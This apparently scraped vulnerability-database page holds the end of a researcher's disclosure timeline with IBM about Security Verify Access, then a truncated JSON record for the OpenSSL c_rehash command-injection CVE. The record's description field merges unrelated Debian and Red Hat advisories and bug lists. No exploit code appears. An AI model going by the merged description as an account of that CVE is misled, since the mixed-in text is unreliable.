Apr 10, 2024: I reached IBM regarding a new security bulletin, with a potential vulnerability I reported https://www.ibm.com/support/pages/node/7145828.
Apr 10, 2024: IBM said this security bulletin was unrelated to the vulnerabilities I reported.
Apr 15, 2024: IBM confirmed that the final vulnerabilities would be fixed in ISVA 10.0.8.
Apr 15, 2024: I provided a list of unfixed vulnerabilities and asked for more information.
Apr 16, 2024: IBM confirmed that all the unfixed vulnerabilities would be fixed in ISVA 10.0.8 and asked to close the ticket.
Apr 16, 2024: I confirmed that this ticket can be closed only when the security patches are available.
Apr 16, 2024: IBM confirmed they wanted to close the ticket because nothing would be updated before mid-2024.
Apr 17, 2024: I replied that "It makes no sense to close this ticket until the vulnerabilities have been fixed. The fact that the vulnerabilities are fixed mid-year is a decision made by IBM. IBM was made aware of these vulnerabilities over a year ago, and yet we are still waiting for security patches. If this ticket is closed, I would consider that the vulnerabilities have been fixed and it is perfectly fine to publish the technical analysis."
May 6, 2024: IBM closed the existing ticket and opened new tickets for the remaining vulnerabilities.
May 6, 2024: I contacted IBM PSIRT asking if it was fine to publish the vulnerabilities since the ticket was closed by IBM.
May 7, 2024: I reopened the ticket stating that some of the patched vulnerabilities did not receive a CVE and there were also some unpatched vulnerabilities. I asked IBM to provide me with the CVE assigned to each vulnerability. I also asked IBM to confirm that, since this ticket had been closed by IBM, all the vulnerabilities had been fixed and that I would be able to publish the technical details.
May 8, 2024: IBM said they would review the list of vulnerabilities.
May 10, 2024: IBM PSIRT asked me not to publish technical details of unpatched vulnerabilities.
May 17, 2024: IBM provided me with an incomplete list of CVEs, with different vulnerabilities under the same CVE identifier and asked to close the ticket.
May 20, 2024: IBM asked for my comments on the list of CVEs.
May 20, 2024: I confirmed that several CVEs were missing and the list was incomplete.
May 21, 2024: IBM provided me with an explanation regarding the missing CVEs.
May 21, 2024: I asked IBM to quote their explanation in the security advisory.
May 21, 2024: IBM asked to have a meeting.
May 22, 2024: I replied that I would prefer written communication since it was very difficult to track the status of the vulnerabilities with (1) CVEs obtained only several months after the release of security bulletins, (2) tickets closed by IBM for unpatched vulnerabilities, (3) vulnerabilities in ibmsecurity which could be corrected by IBM and which could then no longer be managed by IBM, and (4) missing CVEs.
May 22, 2024: IBM asked to have a meeting to remove any confusion.
May 23, 2024: I replied that there's not much confusion except missing CVEs for silently patched vulnerabilities and lack of communication from IBM when releasing security patches. I asked IBM to share the CVEs with the corresponding vulnerabilities and indicate the security bulletins with the list of corresponding vulnerabilities.
May 24, 2024: IBM stated they would provide me with additional CVEs.
May 30, 2024: I confirmed that the creation of additional CVEs is fair.
Jun 2, 2024: IBM confirmed 3 new CVEs in a new security bulletin: https://www.ibm.com/support/pages/node/7155356.
Jun 3, 2024: I asked IBM the release date of the 10.0.8 version.
Jun 3, 2024: IBM confirmed that the exact date was not yet decided.
Jun 6, 2024: IBM asked if I had comments about the remaining vulnerabilities.
Jun 8, 2024: I asked IBM the status of a previously patched vulnerability.
Jun 10, 2024: IBM confirmed that this vulnerability had not been previously patched and would be patched in the 10.0.8 release.
Jun 11, 2024: IBM asked to create separate cases for the remaining vulnerabilities.
Jun 19, 2024: IBM asked if I needed assistance.
Jun 23, 2024: IBM confirmed that the 10.0.8 version was released and that they would close the ticket tracking the vulnerabilities.
Jun 26, 2024: I asked IBM to provide the corresponding CVEs and the link of the security bulletin.
Jun 27, 2024: IBM provided me with the link to the security bulletin: https://www.ibm.com/support/pages/node/7158790 and said that the 10.0.8 version was released with all the patched vulnerabilities. IBM closed the ticket.
Jul 3, 2024: I reopened the ticket and asked IBM to provide me with the list of vulnerabilities with the corresponding CVEs since I was not able to correctly map the CVEs to the vulnerabilities I reported.
Jul 8, 2024: IBM provided me with the list of CVEs. IBM closed the ticket.
Sep 7, 2024: I sent an email to IBM PSIRT stating that I was going to publish the security advisory and that some CVEs were still missing. I also stated that CVE-2023-38371 seemed to be an error since it was confirmed not to be a vulnerability according to our previous email exchanges.
Sep 9, 2024: I asked IBM to provide me with an official link regarding the runtime authentication bypass, to publish it in the security advisory.
Sep 13, 2024: IBM PSIRT provided me with (1) links regarding the runtime authentication bypass and (2) additional CVEs. They also confirmed that at least one vulnerability was not fixed and asked me not to disclose this finding until it was patched. No information was provided when this vulnerability would be patched.
Nov 1, 2024: A security advisory is published.

Credits

These vulnerabilities were found by Pierre Barre aka Pierre Kim (@PierreKimSec).

References

https://pierrekim.github.io/blog/2024-11-01-ibm-security-verify-access-32-vulnerabilities.html

https://pierrekim.github.io/advisories/2024-ibm-security-verify-access.txt

https://pierrekim.github.io/blog/2024-11-01-ibmsecurity-4-vulnerabilities.html

https://pierrekim.github.io/advisories/2024-ibmsecurity.txt

https://www.ibm.com/support/pages/node/7106586

https://www.ibm.com/support/pages/node/7145400

https://www.ibm.com/support/pages/node/7155356

https://www.ibm.com/support/pages/node/7158790

Disclaimer

This advisory is licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 License: http://creativecommons.org/licenses/by-nc-sa/3.0/

-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEEoSgI9MSrzxDXWrmCxD4O2n2TLbwFAmckrf4ACgkQxD4O2n2T LbzphQ//dkcrCH8Q+yNrjdYoxvY/wXwc1JfgXxmLK7Ns3N5qFJVT70Uea6HjIoHz eJQurricioTP8jG48J2uzIt7l4G4Kgv0zP+aPN/KXjfYghu46N4G29458OgXTHVe ecOmouy/za1DG6qtST+sbicDhX5oku4VtdQ+NtDXaoLUAkADp/wJ3rLv5Fdw7gxQ VR0OMUTsy50Vv1bRN2R77ZAs/odAY67pQfTw8QpKLDDLBZveeAwBLgc66rQ+KZjq mPbLUULFlZp3+EYnR+XyZXu2nNGZDhTVMKAYCGzuqr3/boIz1BF7rifK07tL8+EE +NQQK3kzauWuQ/Sl5X20kfvdC91g7d/G93Me+Uz9iSfB9cyDfAdCLNf6fyYi/xjE qz6HNe2capSG7GBeCK6Q8ffb95kojjKrmyL2eKj2Yz5ZCWuDXa0L6pLwHZ9KSyjj 24kykmiHI4bCKBCXazBVYcdguk+6PCcenAGxLIpKdmTcMvaUUbN/c2jUenjV8/As +akcA48mNjuITE+Qei9kn7R5huTSCZffws9j4r0P86dst0ZkYfNSWgThatk2NRwC V8D2DOXdxpXThuOAMfN4b9ViLYTeHm2/JGvl0RLQNyNSv2rWeeEch6Z69NsS/Fq7 Y7L55juYeCFtkTrdYA+tkaUHlvX8uQC9GoKkcUOfYV6utGQ4fnU= =3Ax6 -----END PGP SIGNATURE-----

Show details on source website

JSON

To clipboard

{
  "affected_products": {
    "_id": null,
    "data": [
      {
        "_id": null,
        "model": "h610s",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "_id": null,
        "model": "openssl",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "openssl",
        "version": "3.0.4"
      },
      {
        "_id": null,
        "model": "snapmanager",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "_id": null,
        "model": "h700s",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "_id": null,
        "model": "h410c",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "_id": null,
        "model": "aff a400",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "_id": null,
        "model": "ontap select deploy administration utility",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "_id": null,
        "model": "fedora",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "fedoraproject",
        "version": "35"
      },
      {
        "_id": null,
        "model": "sannav",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "broadcom",
        "version": null
      },
      {
        "_id": null,
        "model": "openssl",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "openssl",
        "version": "1.0.2"
      },
      {
        "_id": null,
        "model": "solidfire",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "_id": null,
        "model": "h410s",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "_id": null,
        "model": "h615c",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "_id": null,
        "model": "hci management node",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "_id": null,
        "model": "linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "debian",
        "version": "10.0"
      },
      {
        "_id": null,
        "model": "sinec ins",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "siemens",
        "version": "1.0"
      },
      {
        "_id": null,
        "model": "openssl",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "openssl",
        "version": "1.1.1p"
      },
      {
        "_id": null,
        "model": "linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "debian",
        "version": "11.0"
      },
      {
        "_id": null,
        "model": "h300s",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "_id": null,
        "model": "fedora",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "fedoraproject",
        "version": "36"
      },
      {
        "_id": null,
        "model": "fas 8300",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "_id": null,
        "model": "bootstrap os",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "_id": null,
        "model": "fas 8700",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "_id": null,
        "model": "fas a400",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "_id": null,
        "model": "openssl",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "openssl",
        "version": "1.0.2zf"
      },
      {
        "_id": null,
        "model": "aff 8700",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "_id": null,
        "model": "aff 8300",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "_id": null,
        "model": "h610c",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "_id": null,
        "model": "h500s",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "_id": null,
        "model": "element software",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "_id": null,
        "model": "sinec ins",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "siemens",
        "version": "1.0"
      },
      {
        "_id": null,
        "model": "openssl",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "openssl",
        "version": "1.1.1"
      },
      {
        "_id": null,
        "model": "smi-s provider",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "_id": null,
        "model": "openssl",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "openssl",
        "version": "3.0.0"
      },
      {
        "_id": null,
        "model": "ontap antivirus connector",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "_id": null,
        "model": "santricity smi-s provider",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2022-2068"
      }
    ]
  },
  "credits": {
    "_id": null,
    "data": "Red Hat",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "168022"
      },
      {
        "db": "PACKETSTORM",
        "id": "168112"
      },
      {
        "db": "PACKETSTORM",
        "id": "170741"
      },
      {
        "db": "PACKETSTORM",
        "id": "170196"
      },
      {
        "db": "PACKETSTORM",
        "id": "170165"
      },
      {
        "db": "PACKETSTORM",
        "id": "170179"
      }
    ],
    "trust": 0.6
  },
  "cve": "CVE-2022-2068",
  "cvss": {
    "_id": null,
    "data": [
      {
        "cvssV2": [
          {
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "nvd@nist.gov",
            "availabilityImpact": "COMPLETE",
            "baseScore": 10.0,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 10.0,
            "id": "CVE-2022-2068",
            "impactScore": 10.0,
            "integrityImpact": "COMPLETE",
            "severity": "HIGH",
            "trust": 1.1,
            "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
            "version": "2.0"
          }
        ],
        "cvssV3": [
          {
            "attackComplexity": "LOW",
            "attackVector": "LOCAL",
            "author": "nvd@nist.gov",
            "availabilityImpact": "HIGH",
            "baseScore": 7.3,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "exploitabilityScore": 1.3,
            "id": "CVE-2022-2068",
            "impactScore": 5.9,
            "integrityImpact": "HIGH",
            "privilegesRequired": "LOW",
            "scope": "UNCHANGED",
            "trust": 1.0,
            "userInteraction": "REQUIRED",
            "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H",
            "version": "3.1"
          },
          {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "author": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
            "availabilityImpact": "HIGH",
            "baseScore": 9.8,
            "baseSeverity": "CRITICAL",
            "confidentialityImpact": "HIGH",
            "exploitabilityScore": 3.9,
            "id": "CVE-2022-2068",
            "impactScore": 5.9,
            "integrityImpact": "HIGH",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "trust": 1.0,
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.1"
          }
        ],
        "severity": [
          {
            "author": "nvd@nist.gov",
            "id": "CVE-2022-2068",
            "trust": 1.0,
            "value": "HIGH"
          },
          {
            "author": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
            "id": "CVE-2022-2068",
            "trust": 1.0,
            "value": "CRITICAL"
          },
          {
            "author": "VULMON",
            "id": "CVE-2022-2068",
            "trust": 0.1,
            "value": "HIGH"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "VULMON",
        "id": "CVE-2022-2068"
      },
      {
        "db": "NVD",
        "id": "CVE-2022-2068"
      },
      {
        "db": "NVD",
        "id": "CVE-2022-2068"
      }
    ]
  },
  "description": {
    "_id": null,
    "data": "In addition to the c_rehash shell command injection identified in CVE-2022-1292, further circumstances where the c_rehash script does not properly sanitise shell metacharacters to prevent command injection were found by code review. When the CVE-2022-1292 was fixed it was not discovered that there are other places in the script where the file names of certificates being hashed were possibly passed to a command executed through the shell. This script is distributed by some operating systems in a manner where it is automatically executed. On such operating systems, an attacker could execute arbitrary commands with the privileges of the script. Use of the c_rehash script is considered obsolete and should be replaced by the OpenSSL rehash command line tool. Fixed in OpenSSL 3.0.4 (Affected 3.0.0,3.0.1,3.0.2,3.0.3). Fixed in OpenSSL 1.1.1p (Affected 1.1.1-1.1.1o). Fixed in OpenSSL 1.0.2zf (Affected 1.0.2-1.0.2ze). (CVE-2022-2068). Description:\n\nRed Hat Ceph Storage is a scalable, open, software-defined storage platform\nthat combines the most stable version of the Ceph storage system with a\nCeph management platform, deployment utilities, and support services. \n\nSpace precludes documenting all of these changes in this advisory. Bugs fixed (https://bugzilla.redhat.com/):\n\n2031228 - CVE-2021-43813 grafana: directory traversal vulnerability\n2044628 - CVE-2022-21673 grafana: Forward OAuth Identity Token can allow users to access some data sources\n2115198 - build ceph containers for RHCS 5.2 release\n\n5. \n\nFor the oldstable distribution (buster), this problem has been fixed\nin version 1.1.1n-0+deb10u3. \n\nFor the stable distribution (bullseye), this problem has been fixed in\nversion 1.1.1n-0+deb11u3. \n\nWe recommend that you upgrade your openssl packages. \n\nFor the detailed security status of openssl please refer to\nits security tracker page at:\nhttps://security-tracker.debian.org/tracker/openssl\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n-----BEGIN PGP SIGNATURE-----\n\niQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmK4pF0ACgkQEMKTtsN8\nTjYP5g//SyfB1W/vUNmgeSp2kKu3vt9CPwoXMK8nhTcA7iYhkxIJTFxAWDpn+4S7\nW4kYyxMRFSIHKv4FLiLgi/Vzn4g1kB1UvKv05CFhEJqpWMyyRj6FdmebLlkLG0eE\nIGsZoQl9be+lRJ+E4oMMkrRkbJV5II7s69vdxFDh4893Ndx05GWWvXT5Doc5gFMi\nNoNabBH47GFU6aGDwVJU+xooBT6s4QMOrgVKYbxhM5PO98HQzk0zv0Z6YRx7FzKD\nhYMN/t6A8qj4zMQqJqM+44q9zpDryyolGLewvgOit1HFFnLlBf4wsdBvE7AGhvGs\nLam5OXLhlwlQT6gBNd4XFAShdEZGLVF2DCgKzMh5cG5r2W10ewfHHyOR4CnkMQQP\nePA8YvhVwSH3I5jOTS75A18LXpoRJKRXQuQ7v9di2C8qRZ0qnM95h0KzH9/UKyUc\nTmF09MTKWoFCkCtyzucdPnoyUPhdScJc08jcGJ37MCb8uKI4F5jVImLnHC6qS6Oc\nGab3OPIDzS8I1rro0J1k8RJE1E8XvfCxgVAOoebn0mst8qT+38hqsTFykG+uq3dN\nsfhwI+E8iOeVOapyDVzxz8DfIkyBdnFsM4cg9VxDPOOllN+BknySqvzxu+aYpMFz\nK/D6g421XIIXPXD+sP/w1ENPV7LFobRR7KXUWvjS5l/Ir8dhPdQ=\n=tiWq\n-----END PGP SIGNATURE-----\n. \n\nRed Hat Product Security has rated this update as having a security impact\nof Important. A Common Vulnerability Scoring System (CVSS) base score,\nwhich gives a detailed severity rating, is available for each vulnerability\nfrom the CVE link(s) in the References section. \n\n2. Description:\n\nLogging Subsystem 5.5.0 - Red Hat OpenShift\n\nSecurity Fix(es):\n\n* kubeclient: kubeconfig parsing error can lead to MITM attacks\n(CVE-2022-0759)\n\n* golang: compress/gzip: stack exhaustion in Reader.Read (CVE-2022-30631)\n\n* golang: out-of-bounds read in golang.org/x/text/language leads to DoS\n(CVE-2021-38561)\n\n* prometheus/client_golang: Denial of service using\nInstrumentHandlerCounter (CVE-2022-21698)\n\nFor more details about the security issue(s), including the impact, a CVSS\nscore, acknowledgments, and other related information, refer to the CVE\npage(s) listed in the References section. \n\n3. Solution:\n\nFor details on how to apply this update, which includes the changes\ndescribed in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258\n\n4. Bugs fixed (https://bugzilla.redhat.com/):\n\n2045880 - CVE-2022-21698 prometheus/client_golang: Denial of service using InstrumentHandlerCounter\n2058404 - CVE-2022-0759 kubeclient: kubeconfig parsing error can lead to MITM attacks\n2100495 - CVE-2021-38561 golang: out-of-bounds read in golang.org/x/text/language leads to DoS\n2107342 - CVE-2022-30631 golang: compress/gzip: stack exhaustion in Reader.Read\n\n5. JIRA issues fixed (https://issues.jboss.org/):\n\nLOG-1415 - Allow users to tune fluentd\nLOG-1539 - Events and CLO csv are not collected after running `oc adm must-gather --image=$downstream-clo-image `\nLOG-1713 - Reduce Permissions granted for prometheus-k8s service account\nLOG-2063 - Collector pods fail to start when a Vector only Cluster Logging instance is created. \nLOG-2134 - The infra logs are sent to app-xx indices\nLOG-2159 - Cluster Logging Pods in CrashLoopBackOff\nLOG-2165 - [Vector] Default log level debug makes it hard to find useful error/failure messages. \nLOG-2167 - [Vector] Collector pods fails to start with configuration error when using Kafka SASL over SSL\nLOG-2169 - [Vector] Logs not being sent to Kafka with SASL plaintext. \nLOG-2172 - [vector]The openshift-apiserver and ovn audit logs can not  be collected. \nLOG-2242 - Log file metric exporter is still following /var/log/containers files. \nLOG-2243 - grafana-dashboard-cluster-logging should be deleted once clusterlogging/instance was removed\nLOG-2264 - Logging link should contain an icon\nLOG-2274 - [Logging 5.5] EO doesn\u0027t recreate secrets kibana and kibana-proxy after removing them. \nLOG-2276 - Fluent config format is hard to read via configmap\nLOG-2290 - ClusterLogging Instance status in not getting updated in UI\nLOG-2291 - [release-5.5] Events listing out of order in Kibana 6.8.1\nLOG-2294 - [Vector] Vector internal metrics are not exposed via HTTPS due to which OpenShift Monitoring Prometheus service cannot scrape the metrics endpoint. \nLOG-2300 - [Logging 5.5]ES pods can\u0027t be ready after removing secret/signing-elasticsearch\nLOG-2303 - [Logging 5.5] Elasticsearch cluster upgrade stuck\nLOG-2308 - configmap grafana-dashboard-elasticsearch is being created and deleted continously\nLOG-2333 - Journal logs not reaching Elasticsearch output\nLOG-2337 - [Vector] Missing @ prefix from the timestamp field in log record. \nLOG-2342 - [Logging 5.5] Kibana pod can\u0027t connect to ES cluster after removing secret/signing-elasticsearch: \"x509: certificate signed by unknown authority\"\nLOG-2384 - Provide a method to get authenticated from GCP\nLOG-2411 - [Vector] Audit logs forwarding not working. \nLOG-2412 - CLO\u0027s loki output url is parsed wrongly\nLOG-2413 - PriorityClass cluster-logging is deleted if provide an invalid log type\nLOG-2418 - EO supported time units don\u0027t match the units specified in CRDs. \nLOG-2439 - Telemetry: the managedStatus\u0026healthStatus\u0026version values are wrong\nLOG-2440 - [loki-operator] Live tail of logs does not work on OpenShift\nLOG-2444 - The write index is removed when `the size of the index` \u003e `diskThresholdPercent% * total size`. \nLOG-2460 - [Vector] Collector pods fail to start on a FIPS enabled cluster. \nLOG-2461 - [Vector] Vector auth config not generated when user provided bearer token is used in a secret for connecting to LokiStack. \nLOG-2463 - Elasticsearch operator repeatedly prints error message when checking indices\nLOG-2474 - EO shouldn\u0027t grant cluster-wide permission to system:serviceaccount:openshift-monitoring:prometheus-k8s when ES cluster is deployed. [openshift-logging 5.5]\nLOG-2522 - CLO supported time units don\u0027t match the units specified in CRDs. \nLOG-2525 - The container\u0027s logs are not sent to separate index if the annotation is added after the pod is ready. \nLOG-2546 - TLS handshake error on loki-gateway for FIPS cluster\nLOG-2549 - [Vector] [master] Journald logs not sent to the Log store when using Vector as collector. \nLOG-2554 - [Vector] [master] Fallback index is not used when structuredTypeKey is missing from JSON log data\nLOG-2588 - FluentdQueueLengthIncreasing rule failing to be evaluated. \nLOG-2596 - [vector]the condition in [transforms.route_container_logs] is inaccurate\nLOG-2599 - Supported values for level field don\u0027t match documentation\nLOG-2605 - $labels.instance is empty in the message when firing FluentdNodeDown alert\nLOG-2609 - fluentd and vector are unable to ship logs to elasticsearch when cluster-wide proxy is in effect\nLOG-2619 - containers violate PodSecurity -- Log Exporation\nLOG-2627 - containers violate PodSecurity -- Loki\nLOG-2649 - Level Critical should match the beginning of the line as the other levels\nLOG-2656 - Logging uses deprecated v1beta1 apis\nLOG-2664 - Deprecated Feature logs causing too much noise\nLOG-2665 - [Logging 5.5] Sometimes collector fails to push logs to Elasticsearch cluster\nLOG-2693 - Integration with Jaeger fails for ServiceMonitor\nLOG-2700 - [Vector] vector container can\u0027t start due to \"unknown field `pod_annotation_fields`\" . \nLOG-2703 - Collector DaemonSet is not removed when CLF is deleted for fluentd/vector only CL instance\nLOG-2725 - Upgrade logging-eventrouter Golang  version and tags\nLOG-2731 - CLO keeps reporting `Reconcile ServiceMonitor retry error` and `Reconcile Service retry error` after creating clusterlogging. \nLOG-2732 - Prometheus Operator pod throws \u0027skipping servicemonitor\u0027 error on Jaeger integration\nLOG-2742 - unrecognized outputs when use the sts role secret\nLOG-2746 - CloudWatch forwarding rejecting large log events, fills tmpfs\nLOG-2749 - OpenShift Logging Dashboard for Elastic Shards shows \"active_primary\" instead of \"active\" shards. \nLOG-2753 - Update Grafana configuration for LokiStack integration on grafana/loki repo\nLOG-2763 - [Vector]{Master} Vector\u0027s healthcheck fails when forwarding logs to Lokistack. \nLOG-2764 - ElasticSearch operator does not respect referencePolicy when selecting oauth-proxy image\nLOG-2765 - ingester pod can not be started in IPv6 cluster\nLOG-2766 - [vector] failed to parse cluster url: invalid authority IPv6 http-proxy\nLOG-2772 - arn validation failed when role_arn=arn:aws-us-gov:xxx\nLOG-2773 - No cluster-logging-operator-metrics  service in logging 5.5\nLOG-2778 - [Vector] [OCP 4.11] SA token not added to Vector config when connecting to LokiStack instance without CLF creds secret required by LokiStack. \nLOG-2784 - Japanese log messages are garbled at Kibana\nLOG-2793 - [Vector] OVN audit logs are missing the level field. \nLOG-2864 - [vector] Can not sent logs to default when loki is the default output in CLF\nLOG-2867 - [fluentd] All logs are sent to application tenant when loki is used as default logstore in CLF. \nLOG-2873 - [Vector] Cannot configure CPU/Memory requests/limits when using Vector as collector. \nLOG-2875 - Seeing a black rectangle box on the graph in Logs view\nLOG-2876 - The link to the \u0027Container details\u0027 page on the \u0027Logs\u0027 screen throws error\nLOG-2877 - When there is no query entered, seeing error message on the Logs view\nLOG-2882 - RefreshIntervalDropdown and TimeRangeDropdown always set back to its original values when switching between pages in \u0027Logs\u0027 screen\n\n6. References:\n\nhttps://access.redhat.com/security/cve/CVE-2021-38561\nhttps://access.redhat.com/security/cve/CVE-2022-0759\nhttps://access.redhat.com/security/cve/CVE-2022-1012\nhttps://access.redhat.com/security/cve/CVE-2022-1292\nhttps://access.redhat.com/security/cve/CVE-2022-1586\nhttps://access.redhat.com/security/cve/CVE-2022-1785\nhttps://access.redhat.com/security/cve/CVE-2022-1897\nhttps://access.redhat.com/security/cve/CVE-2022-1927\nhttps://access.redhat.com/security/cve/CVE-2022-2068\nhttps://access.redhat.com/security/cve/CVE-2022-2097\nhttps://access.redhat.com/security/cve/CVE-2022-21698\nhttps://access.redhat.com/security/cve/CVE-2022-30631\nhttps://access.redhat.com/security/cve/CVE-2022-32250\nhttps://access.redhat.com/security/updates/classification/#important\n\n7. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2022 Red Hat, Inc. Summary:\n\nRed Hat OpenShift Virtualization release 4.12 is now available with updates\nto packages and images that fix several bugs and add enhancements. Description:\n\nOpenShift Virtualization is Red Hat\u0027s virtualization solution designed for\nRed Hat OpenShift Container Platform. \n\nRHEL-8-CNV-4.12\n\n=============\nbridge-marker-container-v4.12.0-24\ncluster-network-addons-operator-container-v4.12.0-24\ncnv-containernetworking-plugins-container-v4.12.0-24\ncnv-must-gather-container-v4.12.0-58\nhco-bundle-registry-container-v4.12.0-769\nhostpath-csi-driver-container-v4.12.0-30\nhostpath-provisioner-container-v4.12.0-30\nhostpath-provisioner-operator-container-v4.12.0-31\nhyperconverged-cluster-operator-container-v4.12.0-96\nhyperconverged-cluster-webhook-container-v4.12.0-96\nkubemacpool-container-v4.12.0-24\nkubevirt-console-plugin-container-v4.12.0-182\nkubevirt-ssp-operator-container-v4.12.0-64\nkubevirt-tekton-tasks-cleanup-vm-container-v4.12.0-55\nkubevirt-tekton-tasks-copy-template-container-v4.12.0-55\nkubevirt-tekton-tasks-create-datavolume-container-v4.12.0-55\nkubevirt-tekton-tasks-create-vm-from-template-container-v4.12.0-55\nkubevirt-tekton-tasks-disk-virt-customize-container-v4.12.0-55\nkubevirt-tekton-tasks-disk-virt-sysprep-container-v4.12.0-55\nkubevirt-tekton-tasks-modify-vm-template-container-v4.12.0-55\nkubevirt-tekton-tasks-operator-container-v4.12.0-40\nkubevirt-tekton-tasks-wait-for-vmi-status-container-v4.12.0-55\nkubevirt-template-validator-container-v4.12.0-32\nlibguestfs-tools-container-v4.12.0-255\novs-cni-marker-container-v4.12.0-24\novs-cni-plugin-container-v4.12.0-24\nvirt-api-container-v4.12.0-255\nvirt-artifacts-server-container-v4.12.0-255\nvirt-cdi-apiserver-container-v4.12.0-72\nvirt-cdi-cloner-container-v4.12.0-72\nvirt-cdi-controller-container-v4.12.0-72\nvirt-cdi-importer-container-v4.12.0-72\nvirt-cdi-operator-container-v4.12.0-72\nvirt-cdi-uploadproxy-container-v4.12.0-71\nvirt-cdi-uploadserver-container-v4.12.0-72\nvirt-controller-container-v4.12.0-255\nvirt-exportproxy-container-v4.12.0-255\nvirt-exportserver-container-v4.12.0-255\nvirt-handler-container-v4.12.0-255\nvirt-launcher-container-v4.12.0-255\nvirt-operator-container-v4.12.0-255\nvirtio-win-container-v4.12.0-10\nvm-network-latency-checkup-container-v4.12.0-89\n\n3. Bugs fixed (https://bugzilla.redhat.com/):\n\n1719190 - Unable to cancel live-migration if virt-launcher pod in pending state\n2023393 - [CNV] [UI]Additional information needed for cloning when default storageclass in not defined in target datavolume\n2030801 - CVE-2021-44716 golang: net/http: limit growth of header canonicalization cache\n2030806 - CVE-2021-44717 golang: syscall: don\u0027t close fd 0 on ForkExec error\n2040377 - Unable to delete failed VMIM after VM deleted\n2046298 - mdevs not configured with drivers installed, if mdev config added to HCO CR before drivers are installed\n2052556 - Metric \"kubevirt_num_virt_handlers_by_node_running_virt_launcher\" reporting incorrect value\n2053429 - CVE-2022-23806 golang: crypto/elliptic: IsOnCurve returns true for invalid field elements\n2053532 - CVE-2022-23772 golang: math/big: uncontrolled memory consumption due to an unhandled overflow via Rat.SetString\n2053541 - CVE-2022-23773 golang: cmd/go: misinterpretation of branch names can lead to incorrect access control\n2060499 - [RFE] Cannot add additional service (or other objects) to VM template\n2069098 - Large scale |VMs migration is slow due to low migration parallelism\n2070366 - VM Snapshot Restore hangs indefinitely when backed by a snapshotclass\n2071491 - Storage Throughput metrics are incorrect in Overview\n2072797 - Metrics in Virtualization -\u003e Overview period is not clear or configurable\n2072821 - Top Consumers of Storage Traffic in Kubevirt Dashboard giving unexpected numbers\n2079916 - KubeVirt CR seems to be in DeploymentInProgress state and not recovering\n2084085 - CVE-2022-29526 golang: syscall: faccessat checks wrong group\n2086285 - [dark mode] VirtualMachine - in the Utilization card the percentages and the graphs not visible enough in dark mode\n2086551 - Min CPU feature found in labels\n2087724 - Default template show no 